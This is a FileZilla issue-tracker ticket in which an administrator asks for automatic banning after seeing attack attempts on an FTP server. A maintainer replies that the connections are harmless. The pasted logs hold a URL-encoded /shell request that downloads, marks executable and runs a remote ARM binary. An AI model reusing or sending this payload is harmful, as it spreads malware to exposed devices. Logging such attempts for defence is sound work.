Opened 7 years ago
Closed 7 years ago
#11516 closed Feature request (rejected)
Increase in remote attacks against FileZilla FTP Server - Can better protection be implemented
| Reported by: | surr34l | Owned by: | |
|---|---|---|---|
| Priority: | normal | Component: | FileZilla Server |
| Keywords: | security attacks protection | Cc: | |
| Component version: | 0.9.60.2 | Operating system type: | Windows |
| Operating system version: | Windows 10 1709 |
Description
I've seen an increase in attacks against FileZilla FTP Server installs I'm administering.
While it looks like these attacks are unsuccessful, they are getting annoying, and I'd like to ensure my installs are as protected as possible. They are on high ports, but security by obscurity is not real security, only a deterrent until port scanners come along and information is passed around.
(002024)2/7/2018 8:12:33 AM - (not logged in) (123.249.XXX.XXX)> Connected on port [serverport], sending welcome message... (002024)2/7/2018 8:12:33 AM - (not logged in) (123.249.XXX.XXX)> GET / HTTP/1.1 (002059)2/12/2018 20:34:06 PM - (not logged in) (104.207.xxx.xxx)> GET /shell?%77%67%65%74%20%2D%50%20%2F%74%6D%70%20%68%74%74%70%3A%2F%2F%68%66%73%2E%6D%68%61%63%6B%65%72%2E%63%63%3A%39%32%37%38%2F%6C%69%6E%75%78%2E%61%72%6D%3B%63%68%6D%6F%64%20%37%37%37%20%2F%74%6D%70%2F%6C%69%6E%75%78%2E%61%72%6D%3B%2F%74%6D%70%2F%6C%69%6E%75%78%2E%61%72%6D HTTP/1.1 (002059)2/12/2018 20:34:06 PM - (not logged in) (104.207.XXX.XXX)> Referer: http://filezilla.server.ip.address:port/shell?%77%67%65%74%20%2D%50%20%2F%74%6D%70%20%68%74%74%70%3A%2F%2F%68%66%73%2E%6D%68%61%63%6B%65%72%2E%63%63%3A%39%32%37%38%2F%6C%69%6E%75%78%2E%61%72%6D%3B%63%68%6D%6F%64%20%37%37%37%20%2F%74%6D%70%2F%6C%69%6E%75%78%2E%61%72%6D%3B%2F%74%6D%70%2F%6C%69%6E%75%78%2E%61%72%6D (002060)2/12/2018 20:34:06 PM - (not logged in) (104.207.XXX.XXX)> Accept-Language: zh-cn (002060)2/12/2018 20:34:06 PM - (not logged in) (104.207.XXX.XXX)> Host: filezilla.server.ip.address:port
Manual entry and maintenance of an IP Blacklist is cumbersome and time consuming, as indicated here - https://trac.filezilla-project.org/ticket/8855
I would like to see an option to automatically implement kick and ban length already configured in settings for specific commands coming in that match attack patterns, even if I have to maintain my own list of patterns.
More complete logs can also be provided upon request, as there are a lot more entries with each attempt mucking up my logs and console.
You can safely ignore these connections, they are utterly harmless.
In a future version a feature will be added to not show connections from non-logged in users in the log.